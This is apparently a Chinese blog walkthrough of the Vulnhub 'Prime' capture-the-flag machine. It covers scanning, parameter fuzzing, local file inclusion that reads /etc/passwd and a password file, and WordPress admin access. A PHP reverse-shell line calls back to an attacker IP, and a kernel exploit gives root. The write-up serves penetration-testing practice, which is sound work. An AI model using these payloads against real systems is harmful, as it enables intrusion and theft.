靶场笔记- Vulnhub prime

最新推荐文章于 2024-07-27 14:07:25 发布
最新推荐文章于 2024-07-27 14:07:25 发布
阅读量97 收藏
点赞数 2
分类专栏: Vulnhub 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Timerings/article/details/128982745
版权

Prime靶场笔记

一、常规nmap扫描

sudo nmap --min-rate 10000 -p- 192.168.160.176 
sudo nmap -sU --min-rate 10000 -p- 192.168.160.176
sudo nmap -sT -sV -O -p22,80 192.168.160.176
sudo nmap --script=vuln -p22,80 192.168.160.176

二、web渗透

1. web目录扫描

  • sudo dirb http://192.168.160.176/

    发现是WordPress以及dev目录下的提示

  • sudo dirb http://192.168.160.176/ -X .zip,.txt,.php -o report/dirb.txt

    进一步扫描指定后缀文件,发现有三个链接

    http://192.168.160.176/image.php

    http://192.168.160.176/index.php

    http://192.168.160.176/secret.txt

    其中secret.txt有以下提示
    在这里插入图片描述

  • 根据提示打开https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web,发现是让我们用wfuzz扫描参数

  • wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147http://192.168.160.176/image.php?FUZZ=something

  • wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.160.176/index.php?FUZZ=something

    参数扫描发现file参数:
    在这里插入图片描述

2. 参数爆破

  • 结合前面secret.txt提示到的查看location.txt和file参数,拼接查看

    sudo curl http://192.168.160.176/index.php?file=location.txt

    在这里插入图片描述

  • 得到提示在另一个链接使用secrettier360参数测试

    sudo curl http://192.168.160.176/image.php?secrettier360=

    在这里插入图片描述

  • 考虑到上个file参数是文件包含,这个参数也测试文件包含试试读取/etc/passwd,发现有效

    sudo curl http://192.168.160.176/image.php?secrettier360=…/…/…/…/…/…/etc/passwd

    在这里插入图片描述

  • 根据提示找到密码文件

    sudo curl http://192.168.160.176/image.php?secrettier360=…/…/…/…/…/…/home/saket/password.txt

    在这里插入图片描述

  • 利用victor和follow_the_ippsec,登录WordPress后台

    在这里插入图片描述

三、WordPress渗透

  • 已经明确是WordPress,那就先尝试插件和主题模块漏洞,发现主题编辑器,插入下面代码
 <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.160.131/443 0>&1'"); ?>

在这里插入图片描述

  • 访问后获取基础shell权限
    在这里插入图片描述

  • 获取第一个flag:af3c658dcf9d7190da3153519c003456
    在这里插入图片描述

四、提权

  • 尝试过一些常规提权信息收集没啥收货,直接尝试内核提权
    在这里插入图片描述

  • 上传45010.c文件,在靶机上编译并运行,提权成功

    在这里插入图片描述

  • 返回的不是一个交互式shell,利用dpkg -l查看有没有python组件,再利用python生成一个交互式shell

  python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

  • 获取第二个flag:b2b17036da1de94cfb024540a8e7075a

    在这里插入图片描述

Timerings
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
js base64加密 java base64解密_JS base64 加密和 后台 base64解密(防止中文乱码)
weixin_35551678的博客
03-02 2万+
//UnicodeAnsi.js文件//把Unicode转成Ansi和把Ansi转换成Unicodefunction UnicodeChr() {return ‘00A4,00A7,00A8,00B0,00B1,00B7,00D7,00E0,00E1,00E8,00E9,00EA,00EC,00ED,00F2,00F3,00F7,00F9,00FA,00FC,0101,0113,011B,012B...
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
靶场笔记-Vulnhub Prime
wangluoanquan111的博客
08-15 54
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。接下来我将给大家安排一个为期1个月的网络安全初级计划,当你学完后,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web渗透、安全服务、安全分析等岗位;其中,如果你等保模块学的好,还可以从事等保工程师。Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,没必要看完。
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1668
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
红队笔记5-Prime1打靶流程-模糊测试+内核提权(vulnhub
qq_63442530的博客
03-18 988
学习的视频是哔哩哔哩红队笔记:「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼,试试吧,按图索骥!_哔哩哔哩_bilibili打靶时参考文章和本文借鉴文章:红队打靶:Prime1详细打靶思路之模糊测试+内核提权(vulnhub)_prime1靶机-CSDN博客靶机下载链接见:https://download.vulnhub.com/sickos/sick0s1.1.7zSudo nmap -sn 192.168.254.0/24目标主机ip:192.254.168.1441.快速扫描发现存活
红队笔记6-Prime1打靶流程-提权-OpenSSL解密(vulnhub
qq_63442530的博客
03-19 1179
本篇文章是根据靶场作者给出的提权通过openssl解密获得saket用户密码,在saket用户sudo -l提权成功,没有使用内核提权,也是作者想让我们学习openssl解密:1.enc运行密码的查找:find 找备份文件->缺少密码时可以通过查找备份文件可能存有密码2.密钥的处理:我们获得密钥,对其进行md5加密(md5sum)和16进制转换(od)3.openssl解密参数构造:查看openssl帮助文档,确定参数。
vulnhub靶场PRIME:1打靶过程记录
didiplus
07-17 2867
最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。
vulnhub靶场 prime1靶机获得flag
weixin_43410194的博客
08-17 1927
vulnhub靶场 prime1靶机获得flag
打靶:vulnhub中的Prime1
qq_73865998的博客
04-18 1509
复现视频:【「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼,试试吧,按图索骥!
Prime靶场
wcl20010的博客
05-02 473
prime靶场vulnhub靶场地址:链接:https://pan.baidu.com/s/1jsccNmrmhG2dPuaz6zGwmA 提取码:ap5g 目录 X shell 连接 kali: #首先查看kali是否打开了22端口。ssh协议:ssh远程连接 netstat -an|grep 22 #打开服务 service ssh start 1. 主机发现: #采用nmap nmap -sP 192.168.128.1/24 #直接对128这个网段进行扫描,-sP代表只进行p
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
vuInhub靶场实战系列-prime:1
06-05
vuInhub靶场实战系列-prime:1
网络安全自学从入门到精通的制胜攻略!!!
最新发布
2301_77160226的博客
07-27 103
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
网络安全-华为华三交换机防火墙日志解析示例
PanDD_0_1的博客
07-23 354
华为交换机日志解析示例。
“微软蓝屏”事件暴露了网络安全哪些问题?
csdn_aspnet的专栏
07-23 1240
这次由微软系统软件更新引发的“微软蓝屏”事件,无疑是对全球IT基础设施韧性与安全性的重大考验。850万台设备的故障,以及对航空、医疗和传媒等关键行业的广泛影响,再次突显出我们在网络安全和系统稳定性方面的脆弱性。一、问题解析1、更新管理的复杂性:随着技术的不断进步,软件更新的复杂性也在增加。大型系统中,需要兼顾各种硬件、软件和环境,确保更新不会引发兼容性问题,而这往往十分困难。2、供应链风险:如这次事件所示,一个小小的缺陷就可能通过供应链扩散,造成全球性影响。
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 511
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
vulhub靶场cve-2019-14234
09-19
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值